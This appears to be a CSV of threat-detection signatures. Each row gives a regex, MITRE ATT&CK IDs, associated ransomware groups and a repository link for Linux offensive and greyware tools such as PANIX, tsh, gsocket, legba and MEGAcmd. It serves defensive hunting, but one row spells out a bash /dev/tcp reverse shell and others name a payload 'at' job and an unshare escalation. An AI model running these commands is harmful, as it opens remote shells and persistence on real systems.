"*/sudomy.api*",".{0,1000}\/sudomy\.api.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"
"*/telebit/var/log/*",".{0,1000}\/telebit\/var\/log\/.{0,1000}","greyware_tool_keyword","telebit.cloud","Access your devices - Share your stuff (shell from telebit.cloud)","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://telebit.cloud/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/tmp/bin/csprecon*",".{0,1000}\/tmp\/bin\/csprecon.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","93","10","2024-09-04T08:36:01Z","2021-11-15T13:40:56Z"
"*/tmp/bin/subfinder*",".{0,1000}\/tmp\/bin\/subfinder.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","#linux","N/A","7","1","93","10","2024-09-04T08:36:01Z","2021-11-15T13:40:56Z"
"*/tmp/tshd*",".{0,1000}\/tmp\/tshd.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","543","128","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*/unshare -r /bin/sh*",".{0,1000}\/unshare\s\-r\s\/bin\/sh.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*/usr/bin/anydesk*",".{0,1000}\/usr\/bin\/anydesk.{0,1000}","greyware_tool_keyword","anydesk","Anydesk RMM usage","T1021 - T1071 - T1090","TA0008 - TA0011","N/A","BlackSuit - Royal - Akira - BlackCat - Karakurt - LockBit - Rhysida - AvosLocker - Conti - Dagon Locker - Nokoyawa - Quantum - Diavol - Trigona - BlackByte - Cactus - Lapsus$ - Black Basta - MONTI - Karakurt - Dispossessor","RMM","https://www.cert.ssi.gouv.fr/alerte/CERTFR-2024-ALE-003/","1","0","#linux","risk of false positives - compliance detection","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/at -M -f /tmp/payload*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/tmp\/payload.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/usr/bin/at -M -f /usr/bin/atest*",".{0,1000}\/usr\/bin\/at\s\-M\s\-f\s\/usr\/bin\/atest.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/usr/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1*",".{0,1000}\/usr\/bin\/bash\s\-c\s\'bash\s\-i\s\>\&\s\/dev\/tcp\/\$ip\/\$port\s0\>\&1.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","5","454","47","2024-11-28T12:23:11Z","2024-05-19T12:37:40Z"
"*/usr/bin/connectd*",".{0,1000}\/usr\/bin\/connectd.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#linux","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/usr/bin/ehorus_agent*",".{0,1000}\/usr\/bin\/ehorus_agent.{0,1000}","greyware_tool_keyword","EHORUS RMM","Pandora RC (formerly called eHorus) is a computer management system for MS Windows - Linux and MacOS that allows access to registered computers wherever they are from a browser without direct connectivity to their devices from the outside. (server based on VNC)","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Blacksuit - Royal","RMM","https://pandorafms.com/en/remote-control/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*/usr/bin/gs-mount*",".{0,1000}\/usr\/bin\/gs\-mount.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/usr/bin/gs-netcat*",".{0,1000}\/usr\/bin\/gs\-netcat.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/usr/bin/gsocket*",".{0,1000}\/usr\/bin\/gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/usr/bin/gs-sftp*",".{0,1000}\/usr\/bin\/gs\-sftp.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1549","132","2024-12-05T00:41:10Z","2020-09-18T16:14:22Z"
"*/usr/bin/gt client-c *",".{0,1000}\/usr\/bin\/gt\sclient\-c\s.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#linux","N/A","10","10","123","34","2024-10-30T00:37:47Z","2021-11-29T03:09:56Z"
"*/usr/bin/legba*",".{0,1000}\/usr\/bin\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","#linux","N/A","10","10","1467","84","2024-08-21T12:24:49Z","2023-10-23T15:44:06Z"
"*/usr/bin/logger logger ""connectd installer postinst*",".{0,1000}\/usr\/bin\/logger\slogger\s\""connectd\sinstaller\spostinst.{0,1000}","greyware_tool_keyword","remoteit","Expose localhost to internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/remoteit/installer","1","0","#linux","N/A","10","10","24","9","2024-04-17T00:45:45Z","2019-01-29T21:06:02Z"
"*/usr/bin/mega-attr*",".{0,1000}\/usr\/bin\/mega\-attr.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-backup*",".{0,1000}\/usr\/bin\/mega\-backup.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cancel*",".{0,1000}\/usr\/bin\/mega\-cancel.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cat*",".{0,1000}\/usr\/bin\/mega\-cat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cd*",".{0,1000}\/usr\/bin\/mega\-cd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cmd*",".{0,1000}\/usr\/bin\/mega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cmd*",".{0,1000}\/usr\/bin\/mega\-cmd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cmd-server*",".{0,1000}\/usr\/bin\/mega\-cmd\-server.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-confirm*",".{0,1000}\/usr\/bin\/mega\-confirm.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-confirmcancel*",".{0,1000}\/usr\/bin\/mega\-confirmcancel.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-cp*",".{0,1000}\/usr\/bin\/mega\-cp.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-debug*",".{0,1000}\/usr\/bin\/mega\-debug.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-deleteversions*",".{0,1000}\/usr\/bin\/mega\-deleteversions.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-df*",".{0,1000}\/usr\/bin\/mega\-df.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-du*",".{0,1000}\/usr\/bin\/mega\-du.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-errorcode*",".{0,1000}\/usr\/bin\/mega\-errorcode.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-exclude*",".{0,1000}\/usr\/bin\/mega\-exclude.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-exec*",".{0,1000}\/usr\/bin\/mega\-exec.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-export*",".{0,1000}\/usr\/bin\/mega\-export.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-find*",".{0,1000}\/usr\/bin\/mega\-find.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-ftp*",".{0,1000}\/usr\/bin\/mega\-ftp.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-get*",".{0,1000}\/usr\/bin\/mega\-get.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-graphics*",".{0,1000}\/usr\/bin\/mega\-graphics.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-help*",".{0,1000}\/usr\/bin\/mega\-help.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-https*",".{0,1000}\/usr\/bin\/mega\-https.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-import*",".{0,1000}\/usr\/bin\/mega\-import.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-invite*",".{0,1000}\/usr\/bin\/mega\-invite.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-ipc*",".{0,1000}\/usr\/bin\/mega\-ipc.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-killsession*",".{0,1000}\/usr\/bin\/mega\-killsession.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-lcd*",".{0,1000}\/usr\/bin\/mega\-lcd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-log*",".{0,1000}\/usr\/bin\/mega\-log.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-login*",".{0,1000}\/usr\/bin\/mega\-login.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-logout*",".{0,1000}\/usr\/bin\/mega\-logout.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-lpwd*",".{0,1000}\/usr\/bin\/mega\-lpwd.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-ls*",".{0,1000}\/usr\/bin\/mega\-ls.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
"*/usr/bin/mega-mediainfo*",".{0,1000}\/usr\/bin\/mega\-mediainfo.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon - EMBER BEAR","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#linux","N/A","10","10","1964","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z"
